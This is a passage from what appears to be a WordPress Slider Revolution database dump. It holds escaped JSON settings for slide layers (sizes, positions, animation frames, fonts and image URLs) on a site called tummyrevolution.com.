\",\"alias\":\"3.\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"251px\",\"e\":true},\"n\":{\"v\":\"252px\",\"e\":true},\"t\":{\"v\":\"248px\",\"e\":true},\"m\":{\"v\":\"221px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"originalWidth\":\"251px\"},\"position\":{\"x\":{\"d\":{\"v\":\"541px\",\"e\":true},\"n\":{\"v\":\"306px\",\"e\":true},\"t\":{\"v\":\"6px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"171px\",\"e\":true},\"t\":{\"v\":\"267px\",\"e\":true},\"m\":{\"v\":\"158px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(23,9,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#fed3c3\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"2\":{\"text\":\"Image 2\",\"alias\":\"Flower\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic21.png\",\"imageId\":4592},\"size\":{\"width\":{\"d\":{\"v\":\"434px\",\"e\":true},\"n\":{\"v\":\"320px\",\"e\":true},\"t\":{\"v\":\"278px\",\"e\":true},\"m\":{\"v\":\"175px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"218px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"140px\",\"e\":true},\"m\":{\"v\":\"88px\",\"e\":true}},\"originalWidth\":434,\"originalHeight\":218,\"aspectRatio\":{\"d\":{\"v\":1.9908256880733945504147186511545442044734954833984375},\"n\":{\"v\":1.9908256880733945504147186511545442044734954833984375},\"t\":{\"v\":1.9908256880733945504147186511545442044734954833984375},\"m\":{\"v\":1.9908256880733945504147186511545442044734954833984375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-558px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"84px\",\"e\":true},\"t\":{\"v\":\"30px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":2000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Parfume\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic11.png\",\"imageId\":4593},\"size\":{\"width\":{\"d\":{\"v\":\"561px\",\"e\":true},\"n\":{\"v\":\"390px\",\"e\":true},\"t\":{\"v\":\"368px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"229px\",\"e\":true},\"t\":{\"v\":\"216px\",\"e\":true},\"m\":{\"v\":\"115px\",\"e\":true}},\"originalWidth\":561,\"originalHeight\":329,\"aspectRatio\":{\"d\":{\"v\":1.7051671732522797331199626569286920130252838134765625},\"n\":{\"v\":1.7051671732522797331199626569286920130252838134765625},\"t\":{\"v\":1.7051671732522797331199626569286920130252838134765625},\"m\":{\"v\":1.7051671732522797331199626569286920130252838134765625}}},\"position\":{\"x\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"v\":\"-428px\",\"e\":true},\"t\":{\"v\":\"55px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":380},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1200,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1920,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 3\",\"alias\":\"Listici\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic41.png\",\"imageId\":4594},\"size\":{\"width\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"209px\",\"e\":true},\"t\":{\"v\":\"120px\",\"e\":true},\"m\":{\"v\":\"77px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"64px\",\"e\":true},\"n\":{\"v\":\"92px\",\"e\":true},\"t\":{\"v\":\"53px\",\"e\":true},\"m\":{\"v\":\"34px\",\"e\":true}},\"originalWidth\":145,\"originalHeight\":64,\"aspectRatio\":{\"d\":{\"v\":2.265625},\"n\":{\"v\":2.265625},\"t\":{\"v\":2.265625},\"m\":{\"v\":2.265625}}},\"position\":{\"x\":{\"d\":{\"v\":\"35px\",\"e\":true},\"n\":{\"v\":\"-563px\",\"e\":true},\"t\":{\"v\":\"-325px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-146px\",\"e\":true},\"t\":{\"v\":\"-233px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":700,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":700,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 4\",\"alias\":\"Kokos\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic31.png\",\"imageId\":4595},\"size\":{\"width\":{\"d\":{\"v\":\"570px\",\"e\":true},\"n\":{\"v\":\"535px\",\"e\":true},\"t\":{\"v\":\"291px\",\"e\":true},\"m\":{\"v\":\"177px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"180px\",\"e\":true},\"n\":{\"v\":\"169px\",\"e\":true},\"t\":{\"v\":\"92px\",\"e\":true},\"m\":{\"v\":\"56px\",\"e\":true}},\"originalWidth\":570,\"aspectRatio\":{\"d\":{\"v\":3.166666666666666518636930049979127943515777587890625},\"n\":{\"v\":3.166666666666666518636930049979127943515777587890625},\"t\":{\"v\":3.166666666666666518636930049979127943515777587890625},\"m\":{\"v\":3.166666666666666518636930049979127943515777587890625}}},\"position\":{\"x\":{\"d\":{\"v\":\"321px\",\"e\":true},\"n\":{\"v\":\"-206px\",\"e\":true},\"t\":{\"v\":\"171px\",\"e\":true},\"m\":{\"v\